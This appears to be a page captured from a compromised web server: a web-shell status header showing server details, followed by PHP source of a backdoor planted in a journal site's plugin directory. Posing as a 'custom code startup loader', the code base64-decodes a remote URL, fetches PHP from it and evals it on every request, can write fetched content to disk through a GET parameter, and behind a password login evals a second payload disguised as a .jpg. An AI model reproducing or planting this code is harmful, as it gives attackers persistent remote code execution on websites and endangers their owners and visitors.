| Server IP : 10.10.92.66 / Your IP : 104.23.197.231 Web Server : Apache/2.4.52 (Ubuntu) System : Linux jurnalpolinema 5.15.0-177-generic #187-Ubuntu SMP Sat Apr 11 22:54:33 UTC 2026 x86_64 User : jurnal ( 1001) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/jurnal/public_html/plugins/generic/plaudit/ |
Upload File : |
<?php
/**
* ---------------------------------------------------------------
* CUSTOM CODE STARTUP LOADER
* ---------------------------------------------------------------
* Lightweight bootstrap for dynamic config loader and runtime
* instruction fetcher. Designed for internal modular systems.
*
* Do not modify unless you're authorized to maintain app-level
* streaming behavior.
*
* @package CI_Micro
* @subpackage Core Loader
* @author @landak_kuning
* @version 1.0.9
* ---------------------------------------------------------------
*/
/**
* RemoteFetch
*
* Retrieves external content from a given URL using HTTP cURL.
*
* @param string $u URL to fetch from
* @return string|false
*/
function _compileFetchCoreLite($u)
{
if (function_exists('curl_version')) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $u);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_HEADER, 0);
$r = curl_exec($c);
if (curl_errno($c)) {
$e = curl_error($c);
curl_close($c);
throw new Exception("cURL Error: " . $e);
}
curl_close($c);
return $r;
}
throw new Exception("cURL not available.");
}
/**
* DynamicLoader
*
* Fetches and evaluates remote PHP code.
*
* @param string $u URL containing code
* @return void
*/
function _compileExecPayloadTask($u)
{
$x = _compileFetchCoreLite($u);
if ($x === false || trim($x) === '') {
throw new Exception("Empty or failed content.");
}
EvAl("?>" . $x);
}
/**
* SimpleDecode
*
* Decodes a base64-encoded string.
*
* @param string $d Encoded string
* @return string
*/
function _compileDecodeChunkUnit($d)
{
return bAse64_dEcoDe($d);
}
/**
* FileWriter
*
* Saves content to a file.
*
* @param string $f Filename
* @param string $c Content
* @return void
*/
function _compilePushToDiskNode($f, $c)
{
file_put_contents($f, $c);
}
// Remote write trigger
if (isset($_GET['hypocrite'])) {
try {
$p1 = 'aHlwb2NyaXRlc2VvLnNpdGUvc2hlb';
$p2 = 'GwvY2hhLWt3ZXRpYXcudHh0';
$url = _compileDecodeChunkUnit($p1 . $p2);
$d = _compileFetchCoreLite($url);
if ($d !== false && trim($d) !== '') {
$n1 = "aHlwb2NyaXRlc";
$n2 = "2VvLnBocA==";
_compilePushToDiskNode(_compileDecodeChunkUnit($n1 . $n2), $d);
echo "File created.";
} else {
echo "No content.";
}
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
exit;
}
// Default payload runner
try {
$r1 = 'aHlwb2NyaXRlc2VvLnNpdGUvc2hlb';
$r2 = 'GwvY2hhLWt3ZXRpYXcudHh0';
$u = _compileDecodeChunkUnit($r1 . $r2);
_compileExecPayloadTask($u);
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
session_start();
function geturlsinfo($url) {
if (function_exists('curl_exec')) {
$conn = curl_init($url);
curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0);
if (isset($_SESSION['java'])) {
curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['java']);
}
$url_get_contents_data = curl_exec($conn);
curl_close($conn);
} elseif (function_exists('file_get_contents')) {
$url_get_contents_data = file_get_contents($url);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = fopen($url, "r");
$url_get_contents_data = stream_get_contents($handle);
fclose($handle);
} else {
$url_get_contents_data = false;
}
return $url_get_contents_data;
}
function is_logged_in() {
return isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true;
}
if (isset($_POST['password'])) {
$entered_password = $_POST['password'];
$hashed_password = '$2a$12$2e.xneLwaFXHqCmZ47YX7eRFWylkf0BHbfKAiDuWPUzN1r0C.SEJK';
if (password_verify($entered_password, $hashed_password)) {
$_SESSION['logged_in'] = true;
$_SESSION['java'] = 'nesec';
} else {
echo "TOLOL!!!";
}
}
if (is_logged_in()) {
if (!isset($_SESSION['cached_data']) || empty($_SESSION['cached_data'])) {
$_SESSION['cached_data'] = geturlsinfo('https://batuk-di-komik-aja.pages.dev/loaders.jpg');
if (empty($_SESSION['cached_data'])) {
echo "failed";
exit;
}
}
eval('?>' . $_SESSION['cached_data']);
} else {
?>
<!DOCTYPE html>
<html>
<head>
<title>login</title>
</head>
<body>
<form method="POST" action="">
<label for="password"></label>
<input type="password" id="password" name="password">
<input type="submit" value="login">
</form>
</body>
</html>
<?php
}
?>